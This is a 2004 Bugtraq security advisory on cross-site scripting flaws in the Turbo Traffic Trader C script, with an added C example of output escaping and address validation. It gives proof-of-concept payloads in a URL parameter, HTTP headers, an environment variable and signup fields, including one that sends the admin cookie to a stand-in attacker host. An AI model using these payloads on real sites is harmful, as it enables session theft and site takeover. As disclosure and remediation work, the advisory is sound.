List: bugtraq
Subject: Multiple TTT-C XSS vulnerabilities
From: Kaloyan Georgiev <spam () icefire ! org>
Date: 2004-05-17 2:46:11
Message-ID: 20040517024611.2321.qmail () www ! securityfocus ! com
--------------------------------------------------------
Subject: Multiple TTT-C (Turbo Traffic Trader C) XSS vulnerabilities.
Author: Kaloyan Olegov Georgiev (ICEFIRE)
Package name: Turbo Traffic Trader C (TTT-C or TTT3)
Summary: Multiple XSS issues
Date: 2004-05-16
Affected versions: Latest stable TTT version, all betas and release candidates.
Product site: http://www.turbotraffictrader.com/
Vendor response: "nobody cares about you or what you have to say, it's really sad you could be a wealthy person if you just had morals. Dude, I don't care if you post to the boards, I really don't, people are sick of you, everyone that does not know what a thief you are will know after I post, I am ready to take legal action against you."
Need I say more about this response? Extended info: http://www.icefire.org/security/ttt-bugreport.txt
--------------------------------------------------------
Package description (from vendor's site):
The World's Most Advanced Free C Traffic Trading Script
Turbo Traffic Trader C 1.0 is an advanced trading script written entirely in C/Sqlite; it offers you advanced features that cannot be found in other FREE scripts.
Problem description:
TTT-C does not sanitize any of its input variables before writing them back into pages. This allows trivial cross-site scripting and, in some cases, complete hijacking of a site's traffic.
Solution:
Do not use TTT-C, since the vendor does not appear to care about any of these issues.
Note to the vendor: the best option is a CjOverkill-style or similar string-replacement routine that rewrites <, >, % and similar characters before a stored value is written into a page.
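As an added illustration of the fix suggested above (example code written for this page, not code from TTT-C or from CjOverkill), the following C routine does the string replacement for the characters the advisory lists plus the other HTML metacharacters (&, double quote, single quote), and adds the check a practitioner would want for the IP and proxy fields: values that are supposed to be an address are validated as a dotted quad and rejected outright instead of being escaped. The function names html_escape and is_ipv4 are assumptions made for this example, and the sample inputs are constructed from the advisory's proof-of-concept payloads.

```c
/* Added example, not part of TTT-C: output escaping for free-text
 * fields (link, referer, site name/URL, e-mail, ICQ) and an allow-list
 * check for fields that must be an IPv4 address (REMOTE_ADDR,
 * X-Forwarded-For). Function names are invented for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Replacement for one input character, or NULL if it is kept as-is.
 * '%' is included because the advisory lists it; the others are the
 * characters that break out of HTML text or a quoted attribute. */
static const char *html_rep(char c)
{
    switch (c) {
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '&':  return "&amp;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    case '%':  return "&#37;";
    default:   return NULL;
    }
}

/* Escape a stored value before it is written into the admin panel or
 * the toplist. Returns a malloc'd buffer; the caller frees it. */
char *html_escape(const char *in)
{
    size_t out_len = 0;
    for (const char *p = in; *p; p++) {
        const char *rep = html_rep(*p);
        out_len += rep ? strlen(rep) : 1;
    }
    char *out = malloc(out_len + 1);
    if (!out)
        return NULL;
    char *q = out;
    for (const char *p = in; *p; p++) {
        const char *rep = html_rep(*p);
        if (rep) {
            size_t n = strlen(rep);
            memcpy(q, rep, n);
            q += n;
        } else {
            *q++ = *p;
        }
    }
    *q = '\0';
    return out;
}

/* Allow-list check for address fields: exactly four decimal octets
 * 0-255 separated by dots and nothing else. An empty value (the
 * "IP could be null" case) and trailing junk such as "<script>" fail. */
int is_ipv4(const char *s)
{
    int octets = 0;
    if (!s || !*s)
        return 0;
    while (*s) {
        if (*s < '0' || *s > '9')
            return 0;
        int val = 0, digits = 0;
        while (*s >= '0' && *s <= '9') {
            val = val * 10 + (*s - '0');
            if (++digits > 3 || val > 255)
                return 0;
            s++;
        }
        octets++;
        if (*s == '.') {
            if (octets == 4)
                return 0;          /* trailing dot */
            s++;
            if (!*s)
                return 0;          /* "1.2.3." */
        } else if (*s) {
            return 0;              /* anything after the address */
        }
    }
    return octets == 4;
}

int main(void)
{
    /* Constructed inputs based on the advisory's payloads (abridged). */
    const char *link = "testing <script>alert('from_browser_insert');</script>";
    const char *xff  = "192.168.0.1<script>alert('proxy_insert');</script>";
    const char *site = "http://www.owned.com\"<script>cook=document.cookie;</script>";

    char *safe_link = html_escape(link);
    char *safe_site = html_escape(site);
    printf("link: %s\n", safe_link);
    printf("site: %s\n", safe_site);
    printf("X-Forwarded-For payload: %s\n", is_ipv4(xff) ? "accepted" : "rejected");
    printf("plain address:           %s\n", is_ipv4("192.168.0.1") ? "accepted" : "rejected");
    free(safe_link);
    free(safe_site);
    return 0;
}
```

Escaping is applied at output time, when the stored value is written into a page, so the logs keep the raw attacker string for forensics while the admin's browser only ever sees inert text; the address fields are instead validated on the way in, because there is no legitimate reason for REMOTE_ADDR or X-Forwarded-For to contain anything but a dotted quad.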
Problem deep description with proof of concept code:
As no variable is sanitized, anyone can insert HTML code into the admin interface. On sites with trade signup enabled it is also possible to hijack the entire admin interface and steal the admin cookie in order to log in and take over the script. The same flaw can be used to steal all the traffic a given site has.
Links panel XSS proof of concept code:
The link variable is not sanitized and can carry a valid XSS payload.
Example (URL-encoded, then the same request unencoded):
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>
IP Logs panel XSS proof of concept code:
The IP field can be empty (null).
The IP field can carry a valid XSS payload.
The Proxy field (taken from the X-Forwarded-For header) is not sanitized.
The Proxy field can carry a valid XSS payload.
Example for proxy:
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
Host: www.vulnerable.com
Example for IP (requires local shell access on the server):
export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
Running ./ttt-in will then store one poisoned record in the IP log.
Referer Logs panel XSS proof of concept code:
The Referer header is not sanitized and can carry a valid XSS payload:
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
Host: www.vulnerable.com
Edit Panel XSS:
See the Main control panel section below; the Edit panel uses exactly the same variables.
Main control panel XSS (take care with this one: the example is a complete takeover):
For this one you must sign up for a trade. When you sign up as a new trade you are asked for your site information and URL. Insert any HTML code there and it will be stored and rendered.
Example:
Site Name = http://www.owned.com"<script>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';</script>
Site URL = http://www.owned.com"<script>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';</script>
Webmaster e-mail = email@something.com"<script>alert('email_inject');</script>
Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>
This last one could lead to the theft of all the traffic the site has: once the site name or domain gets into the toplist, every visitor of that site will trigger the XSS and be redirected.
Any other HTML will work, so use your imagination. The examples are quite simple, but they make the point.
Kaloyan Olegov Georgiev